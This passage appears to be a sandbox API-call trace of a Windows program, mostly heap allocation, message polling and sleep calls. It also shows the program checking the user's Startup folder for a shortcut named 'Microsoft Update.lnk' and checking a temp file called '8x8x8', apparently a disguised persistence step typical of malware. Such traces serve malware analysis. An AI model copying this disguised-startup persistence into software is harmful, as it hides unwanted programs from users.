hHeap=0x2af0000) returned 1 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865d30 | out: hHeap=0x2af0000) returned 1 [0237.005] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0237.005] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0237.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0237.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0237.007] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0237.007] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0237.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0237.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0237.008] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0237.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0237.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0237.008] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0237.009] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0237.009] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0237.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0237.009] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0237.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0237.010] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0237.010] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eace8 [0237.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0237.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eace8 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0237.011] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0237.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0237.011] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0237.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0237.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0237.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0237.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0237.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0237.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0237.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0237.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0237.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0237.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0237.012] timeGetTime () returned 0x117b32f [0237.012] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.012] Sleep (dwMilliseconds=0xa) [0237.053] timeGetTime () returned 0x117b35e [0237.053] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.053] Sleep (dwMilliseconds=0xa) [0237.097] timeGetTime () returned 0x117b38d [0237.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.097] Sleep (dwMilliseconds=0xa) [0237.192] timeGetTime () returned 0x117b3ea [0237.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.192] Sleep (dwMilliseconds=0xa) [0237.227] timeGetTime () returned 0x117b40a [0237.227] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.227] Sleep (dwMilliseconds=0xa) [0237.278] timeGetTime () returned 0x117b438 [0237.278] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0237.278] TranslateMessage (lpMsg=0x8cf798) returned 0 [0237.278] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0237.278] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0237.278] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0237.278] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.278] Sleep (dwMilliseconds=0xa) [0237.315] timeGetTime () returned 0x117b467 [0237.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.315] Sleep (dwMilliseconds=0xa) [0237.362] timeGetTime () returned 0x117b496 [0237.362] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.362] Sleep (dwMilliseconds=0xa) [0237.399] timeGetTime () returned 0x117b4b5 [0237.399] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.399] Sleep (dwMilliseconds=0xa) [0237.428] timeGetTime () returned 0x117b4d5 [0237.428] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.428] Sleep (dwMilliseconds=0xa) [0237.441] timeGetTime () returned 0x117b4e4 [0237.441] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.441] Sleep (dwMilliseconds=0xa) [0237.456] timeGetTime () returned 0x117b4f4 [0237.456] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.456] Sleep (dwMilliseconds=0xa) [0237.471] timeGetTime () returned 0x117b504 [0237.471] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.471] Sleep (dwMilliseconds=0xa) [0237.487] timeGetTime () returned 0x117b513 [0237.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.487] Sleep (dwMilliseconds=0xa) [0237.502] timeGetTime () returned 0x117b523 [0237.502] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0237.502] Sleep (dwMilliseconds=0xa) [0237.518] timeGetTime () returned 0x117b532 [0237.518] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 